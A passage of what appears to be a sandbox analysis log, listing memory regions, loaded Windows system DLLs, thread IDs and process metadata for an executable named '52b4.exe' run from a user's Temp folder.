0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 1684 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 1685 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1686 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1687 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 1688 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 1689 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1690 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 1691 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1692 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1693 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1694 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1695 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1696 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1697 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1698 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1699 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1700 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1701 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1702 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1703 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1704 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1705 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1706 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1707 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1708 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1709 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1710 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1711 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1712 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1713 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1800 start_va = 0x7fef1170000 end_va = 0x7fef1343fff monitored = 0 entry_point = 0x7fef11a6b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1802 start_va = 0x35c0000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1803 start_va = 0x28d0000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 1804 start_va = 0x2100000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1805 start_va = 0x61c0000 end_va = 0x65bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 1806 start_va = 0x950000 end_va = 0x950fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1807 start_va = 0xac0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1825 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1826 start_va = 0x1600000 end_va = 0x168ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1827 start_va = 0xae0000 end_va = 0xae2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1828 start_va = 0xaf0000 end_va = 0xafffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1829 start_va = 0xb00000 end_va = 0xb0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1830 start_va = 0xb10000 end_va = 0xb1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1831 start_va = 0xb20000 end_va = 0xb2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1890 start_va = 0x1ce0000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1891 start_va = 0x24e0000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1892 start_va = 0x2f40000 end_va = 0x2fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1893 start_va = 0x35c0000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1894 start_va = 0x3740000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1895 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1896 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1897 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1898 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1909 start_va = 0x26e0000 end_va = 0x2789fff monitored = 0 entry_point = 0x26e4104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1910 start_va = 0xaf0000 end_va = 0xafcfff monitored = 0 entry_point = 0xafa138 region_type = mapped_file name = "wuauclt.exe" filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe") Region: id = 1911 start_va = 0x65c0000 end_va = 0x680efff monitored = 0 entry_point = 0x65c236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1912 start_va = 0xaf0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 1913 start_va = 0x34c0000 end_va = 0x353ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 1914 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1915 start_va = 0xaf0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 3155 start_va = 0x940000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 3156 start_va = 0x23c0000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 3157 start_va = 0x2920000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 3158 start_va = 0x29c0000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 3159 start_va = 0x2f50000 end_va = 0x2fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 4287 start_va = 0x940000 end_va = 0x942fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Thread: id = 49 os_tid = 0xe80 Thread: id = 50 os_tid = 0xe78 Thread: id = 51 os_tid = 0xd8c Thread: id = 52 os_tid = 0x7c4 Thread: id = 53 os_tid = 0x480 Thread: id = 54 os_tid = 0x408 Thread: id = 55 os_tid = 0x3b8 Thread: id = 56 os_tid = 0x2a0 Thread: id = 57 os_tid = 0x12c Thread: id = 58 os_tid = 0x110 Thread: id = 59 os_tid = 0x20c Thread: id = 60 os_tid = 0x478 Thread: id = 61 os_tid = 0x444 Thread: id = 62 os_tid = 0x440 Thread: id = 63 os_tid = 0x76c Thread: id = 64 os_tid = 0x748 Thread: id = 65 os_tid = 0x730 Thread: id = 66 os_tid = 0x724 Thread: id = 67 os_tid = 0x6fc Thread: id = 68 os_tid = 0x6f0 Thread: id = 69 os_tid = 0x6c0 Thread: id = 70 os_tid = 0x6ac Thread: id = 71 os_tid = 0x694 Thread: id = 72 os_tid = 0x4b0 Thread: id = 73 os_tid = 0x4ac Thread: id = 74 os_tid = 0x49c Thread: id = 75 os_tid = 0x498 Thread: id = 76 os_tid = 0x48c Thread: id = 77 os_tid = 0x1bc Thread: id = 78 os_tid = 0x120 Thread: id = 79 os_tid = 0x3f0 Thread: id = 80 os_tid = 0x3e4 Thread: id = 81 os_tid = 0x3d8 Thread: id = 82 os_tid = 0x380 Thread: id = 83 os_tid = 0x36c Thread: id = 84 os_tid = 0x364 Thread: id = 87 os_tid = 0xef8 Thread: id = 88 os_tid = 0xefc Thread: id = 89 os_tid = 0xf00 Thread: id = 90 os_tid = 0xf04 Thread: id = 91 os_tid = 0xf14 Thread: id = 97 os_tid = 0xf34 Thread: id = 145 os_tid = 0xf68 Thread: id = 146 os_tid = 0xf6c Thread: id = 147 os_tid = 0xf70 Thread: id = 148 os_tid = 0xf74 Thread: id = 149 os_tid = 0xf78 Thread: id = 150 os_tid = 0xf7c Thread: id = 154 os_tid = 0xf98 Thread: id = 155 os_tid = 0xf9c Thread: id = 156 os_tid = 0xfa0 Thread: id = 174 os_tid = 0xc3c Thread: id = 175 os_tid = 0x7b4 Thread: id = 176 os_tid = 0x700 Thread: id = 177 os_tid = 0x80c Thread: id = 178 os_tid = 0x6d8 Thread: id = 179 os_tid = 0x7a8 Thread: id = 180 os_tid = 0x668 Process: id = "7" image_name = "52b4.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\52b4.exe" page_root = "0x7af16000" os_pid = "0xeec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x390" cmd_line = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" cur_dir = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1832 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1833 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1834 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1835 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1836 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1837 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1838 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1839 start_va = 0x400000 end_va = 0x993fff monitored = 1 entry_point = 0x423000 region_type = mapped_file name = "52b4.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\52b4.exe") Region: id = 1840 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1841 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1842 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1843 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1844 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1845 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1846 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1847 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1848 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1849 start_va = 0x1b0000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1850 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1851 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1852 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1853 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1854 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1855 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1856 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1857 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1858 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1859 start_va = 0x230000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1860 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1861 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1862 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1863 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1864 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1865 start_va = 0x330000 end_va = 0x396fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1866 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1867 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1868 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1869 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1870 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1871 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1872 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1873 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1874 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1875 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1876 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1878 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1879 start_va = 0x3a0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1880 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1881 start_va = 0x9a0000 end_va = 0xb27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 1882 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1883 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1884 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1885 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1886 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1887 start_va = 0xb30000 end_va = 0xcb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 1888 start_va = 0xcc0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 1899 start_va = 0x20c0000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1900 start_va = 0x2120000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 1901 start_va = 0x3a0000 end_va = 0x3a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1902 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1903 start_va = 0x3a0000 end_va = 0x3e4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1904 start_va = 0x3a0000 end_va = 0x3a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1905 start_va = 0x3a0000 end_va = 0x3a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1906 start_va = 0x3a0000 end_va = 0x3a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1907 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1908 start_va = 0x75400000 end_va = 0x75406fff monitored = 0 entry_point = 0x75401120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 1916 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1917 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1918 start_va = 0x2180000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1919 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1920 start_va = 0x2330000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1921 start_va = 0x74440000 end_va = 0x744bffff monitored = 0 entry_point = 0x744537c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1922 start_va = 0x2370000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 1923 start_va = 0x2440000 end_va = 0x251efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002440000" filename = "" Region: id = 1924 start_va = 0x2520000 end_va = 0x27eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1942 start_va = 0x3a0000 end_va = 